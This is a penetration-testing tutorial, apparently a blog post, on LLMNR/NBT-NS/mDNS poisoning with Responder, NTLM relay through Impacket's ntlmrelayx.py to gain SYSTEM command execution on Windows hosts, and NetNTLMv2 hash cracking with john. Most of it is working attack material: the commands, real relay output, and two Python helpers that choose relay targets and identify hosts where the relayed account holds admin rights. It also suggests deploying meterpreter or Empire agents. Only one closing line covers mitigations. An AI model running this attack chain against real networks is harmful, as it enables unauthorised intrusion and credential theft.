
System Shell using NBT-NS, LLMNR & MDNS Poisoning
Background
LLMNR and NBT-NS poisoning, followed by an NTLM relay, is a common way to compromise a Windows host: the captured NetNTLM hash is either cracked offline or relayed to another host to authenticate there. I usually fall back on it when I cannot find a critical vuln such as MS17-010. The attack needs a Windows host on the same segment to look up a name that DNS cannot resolve (a mistyped share, a stale drive mapping, a WPAD lookup); the host then falls back to LLMNR, NBT-NS or mDNS broadcasts, the attacker answers them with Responder, and the victim authenticates to the attacker machine, which is listening on the common service ports and captures the NTLM exchange. More info here and here.
From experience, the relay is a waiting game and one of chance: you start Responder to poison LLMNR and NBT-NS lookups and, at the same time, run a multi-target relay such as Impacket's ntlmrelayx.py against a list of victim hosts. Then you wait and pray for a catch. In a large network you are bound to get a bite in a matter of minutes.
Remember that SMB signing must be off (not required) on the hosts you relay to, otherwise the relayed session is rejected, so the first step is to fingerprint the candidate victim hosts. The signing setting of the machine whose authentication you capture does not matter; only the relay target's does.
Enumeration Steps
On the attacker machine, run Responder to poison the name lookups. Note: if you intend to relay, whether with Responder's MultiRelay or with ntlmrelayx.py, edit /usr/share/responder/Responder.conf and disable the following two servers, otherwise Responder holds ports 445 and 80 and the relay tool cannot bind them:
SMB server
HTTP server
# responder -I eth0 -rwd
Successful start of Responder on the attacker machine:

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [OFF]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [172.16.6.11]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events…
Once Responder is running, it saves the captured hashes under /usr/share/responder/logs/, where they can be cracked with john or hashcat. But we would rather relay the authentication to victim hosts to execute our evil deeds. Responder only captures; the relay needs a separate tool, and since I couldn't get Responder's MultiRelay to work I am using Impacket's ntlmrelayx.py.
First comes the enumeration. I identify hosts with SMB signing turned off using RunFinger (-g prints one grep-friendly line per host):
# responder-RunFinger -i 172.16.16.0/24 -g > smb-hosts.txt
['172.16.16.64', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.63', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.66', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.34', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.74', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.77', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.79', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.80', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.71', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.70', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:26', Null Session: True, MS17-010: False]
['172.16.16.89', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.76', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['172.16.16.56', Os:'indows 7 Professional 7601 Service Pack 1', Domain:'xxx', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
With a bit of awk, cut or sed, whichever you prefer, extract the IP addresses into a target file. Match on the Signing field rather than on the bare word False: every line above also contains MS17-010: False, so a plain grep for False would pull in hosts that do enforce signing.
# grep "Signing:'False'" smb-hosts.txt | cut -d "'" -f2 > targets.txt
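As an added example (not from the original post), here is the same selection done in Python, parsing RunFinger's -g lines into fields so the filter keys on the Signing field rather than on a loose grep. The sample lines, addresses and domain are constructed, the MS17-010 flag is reported separately because the post prefers that route when it exists, and the smb:// prefix makes the relay protocol explicit when the list is fed to ntlmrelayx.py -tf:

```python
"""Select NTLM-relay targets from RunFinger -g output (added example)."""
import re
from typing import Dict, List

# One line per host in grep mode; field names follow RunFinger's own output.
RUNFINGER_LINE = re.compile(
    r"\['(?P<ip>[^']+)',\s*Os:'(?P<os>[^']*)',\s*Domain:'(?P<domain>[^']*)',"
    r"\s*Signing:'(?P<signing>True|False)',\s*Time:'(?P<time>[^']*)',"
    r"\s*Null Session:\s*(?P<null>True|False),\s*MS17-010:\s*(?P<ms17>True|False)\]"
)

# Constructed sample (fake lab hosts, not the hosts from the post). The last
# host requires signing but its line still contains the word "False"
# (MS17-010), so `grep False` alone would wrongly select it as a target.
SAMPLE = """\
['10.0.0.5', Os:'Windows 7 Professional 7601 Service Pack 1', Domain:'LAB', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: True, MS17-010: False]
['10.0.0.6', Os:'Windows 10 Pro 19041', Domain:'LAB', Signing:'False', Time:'2021-01-24 13:58:25', Null Session: False, MS17-010: True]
['10.0.0.10', Os:'Windows Server 2016 Standard 14393', Domain:'LAB', Signing:'True', Time:'2021-01-24 13:58:26', Null Session: False, MS17-010: False]
"""


def parse_runfinger(text: str) -> List[Dict[str, str]]:
    """Turn RunFinger -g lines into dicts; lines that do not match are skipped."""
    hosts = []
    for line in text.splitlines():
        m = RUNFINGER_LINE.search(line)
        if m:
            hosts.append(m.groupdict())
    return hosts


def relay_targets(hosts: List[Dict[str, str]]) -> List[str]:
    """Hosts that accept unsigned SMB sessions, as ntlmrelayx target URLs."""
    return [f"smb://{h['ip']}" for h in hosts if h["signing"] == "False"]


def ms17_candidates(hosts: List[Dict[str, str]]) -> List[str]:
    """Hosts RunFinger flags as MS17-010 vulnerable: worth a direct exploit first."""
    return [h["ip"] for h in hosts if h["ms17"] == "True"]


def naive_grep_false(text: str) -> List[str]:
    """What `grep False | cut -d "'" -f2` does: every line has a False somewhere."""
    return [line.split("'")[1] for line in text.splitlines() if "False" in line]


if __name__ == "__main__":
    parsed = parse_runfinger(SAMPLE)
    print("relay targets :", relay_targets(parsed))
    print("ms17 candidates:", ms17_candidates(parsed))
    print("naive grep     :", naive_grep_false(SAMPLE))
```

Write the relay_targets() output to targets.txt, one URL per line, and it drops straight into the -tf option used in the next section.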
Multi Relay Attack
After formatting the targets, feed the file to ntlmrelayx.py. Entries without a scheme are treated as smb:// targets, and -c runs the given command on every target where the relayed account turns out to be a local administrator:
# ntlmrelayx.py -tf targets.txt -c whoami
Impacket v0.9.19-dev – Copyright 2018 SecureAuth Corporation
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.241
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.241 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.27
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.27 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.28
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.26
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.28 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.248
[*] Authenticating against smb://172.16.21.26 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.13
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.20.248 as xxx\xxx SUCCEED
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.16
[*] Authenticating against smb://172.16.21.13 as xxx\xxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.9 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] Executed specified command on host: 172.16.21.17
nt authority\system
[*] Stopping service RemoteRegistry
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.0
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.0 as xxx\xxxx SUCCEED
[-] DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.3
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.20.253
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
If ntlmrelayx.py was successful you get command execution on the host; above, whoami on 172.16.21.17 returned nt authority\system because ntlmrelayx runs the command through a temporary service (note the RemoteRegistry start and stop around it), not as the relayed user. Read the rest of the output carefully: "Authenticating against ... SUCCEED" followed by "DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied" means the target accepted the relayed credentials, but that account is not a local administrator there, so the service control manager refused the request and nothing ran. Only hosts where the relayed user is a local admin give execution. From here, you can target that specific victim directly and invoke a meterpreter or Empire agent, or any other evil cmd:
# ntlmrelayx.py -t 172.16.21.17 -c dir
Impacket v0.9.19-dev – Copyright 2018 SecureAuth Corporation
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 172.16.4.24, attacking target smb://172.16.21.17
[*] HTTPD: Client requested path: /wpad.dat
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://172.16.21.17 as xxxx\xxxx SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 172.16.21.17
Volume in drive C has no label.
Volume Serial Number is 806C-3558
Directory of C:\Windows\system32
24/01/2021 01:27 PM <DIR> .
24/01/2021 01:27 PM <DIR> ..
21/11/2019 03:06 PM <DIR> 0409
19/12/2012 06:40 AM 3,774 2hps.ico
30/07/2013 02:10 PM 21,824 accelerometerdll.DLL
21/11/2010 11:24 AM 3,745,792 accessibilitycpl.dll
14/07/2009 09:24 AM 39,424 ACCTRES.dll
14/07/2009 09:40 AM 9,216 acledit.dll
14/07/2009 09:40 AM 154,112 aclui.dll
……………. …………………….
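On a large run the ntlmrelayx output above gets long and the relays interleave, and the rpc_s_access_denied line never names its target, so the reliable way to sort hosts is by pairing "Authenticating against ... SUCCEED" with a later "Executed specified command on host". The triage below is an added example, not part of the original post or of Impacket; the log excerpt it runs on is constructed in ntlmrelayx's line format with fake addresses and accounts:

```python
"""Triage ntlmrelayx.py output: where is the relayed account a local admin? (added example)"""
import re
from collections import Counter, defaultdict

AUTH_RE = re.compile(r"Authenticating against (?P<target>\S+) as (?P<account>\S+) SUCCEED")
EXEC_RE = re.compile(r"Executed specified command on host: (?P<host>\S+)")
CONN_RE = re.compile(r"Received connection from (?P<src>\S+), attacking target (?P<target>\S+)")
DENIED_RE = re.compile(r"rpc_s_access_denied")

# Constructed excerpt in ntlmrelayx's format (fake lab addresses and accounts).
SAMPLE_LOG = r"""
[*] HTTPD: Received connection from 10.0.4.24, attacking target smb://10.0.2.41
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://10.0.2.41 as LAB\jdoe SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] HTTPD: Received connection from 10.0.4.24, attacking target smb://10.0.2.17
[*] HTTPD: Client requested path: /wpad.dat
[*] Authenticating against smb://10.0.2.17 as LAB\jdoe SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 10.0.2.17
nt authority\system
[*] Stopping service RemoteRegistry
[*] HTTPD: Received connection from 10.0.4.30, attacking target smb://10.0.2.41
[*] Authenticating against smb://10.0.2.41 as LAB\asmith SUCCEED
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
"""


def _host(target: str) -> str:
    """'smb://10.0.2.17' -> '10.0.2.17' so targets and exec hosts compare equal."""
    return target.split("://", 1)[-1]


def triage(log: str) -> dict:
    authenticated = defaultdict(set)  # host -> accounts whose auth the host accepted
    executed = set()                  # hosts where -c actually ran (account is local admin)
    victims = Counter()               # poisoned clients, by how often they came back
    denied = 0                        # SCM refusals; not attributable to a host in the log
    for line in log.splitlines():
        m = AUTH_RE.search(line)
        if m:
            authenticated[_host(m["target"])].add(m["account"])
            continue
        m = EXEC_RE.search(line)
        if m:
            executed.add(_host(m["host"]))
            continue
        m = CONN_RE.search(line)
        if m:
            victims[m["src"]] += 1
            continue
        if DENIED_RE.search(line):
            denied += 1
    return {
        # Relay again here with a payload: the account is a local admin.
        "admin_on": {h: a for h, a in authenticated.items() if h in executed},
        # Credentials are valid but unprivileged on these hosts; crack them instead.
        "auth_only": {h: a for h, a in authenticated.items() if h not in executed},
        "access_denied": denied,
        "victims": victims,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Run it as ntlmrelayx.py ... | tee relay.log and then triage(open("relay.log").read()); the auth_only set is the list of hosts to hit again after the password has been cracked or once a relay target with admin rights has yielded more credentials.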
Cracking Hash
If the multi relay did not work for you, don't give up yet; you can always try cracking the captured hashes:
# cd /usr/share/responder/logs/
# ls
Analyzer-Session.log
Responder-Session.log
SMB-Relay-SMB-192.168.197.135.txt
Config-Responder.log
SMB-Relay-192.168.197.135.txt
SMBv2-NTLMv2-SSP-192.168.197.135.txt
HTTP-NTLMv2-192.168.197.135.txt
SMBRelay-Session.txt
Poisoners-Session.log
SMB-Relay-SMB-192.168.197.133.txt
Let's feed them into john. The SMBv2-NTLMv2-SSP-*.txt and HTTP-NTLMv2-*.txt files hold the NetNTLMv2 challenge/responses, one line per captured authentication (the SMB-Relay-* files are relay session logs, which john ignores); hashcat mode 5600 takes the same lines:
# john --format=netntlmv2 --wordlist=/tmp/wordlist.txt SMB*
Using default input encoding: UTF-8
Loaded 10 password hashes with 10 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Remaining 8 password hashes with 8 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
xxxxxxxx (user01)
Administrator (Administrator)
8g 0:00:00:00 DONE (2021-01-25 15:25) 800.0g/s 100.0p/s 800.0c/s 800.0C/s xxxxxxx
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Summary
There you go folks: Responder and NTLM relay attacks should be part of your pen-testing arsenal, so remember to try them in your next engagement. For the report, the fixes are equally standard: require SMB signing on servers and clients, and disable LLMNR and NBT-NS (and WPAD where it is unused) so there is nothing left for the poisoner to answer.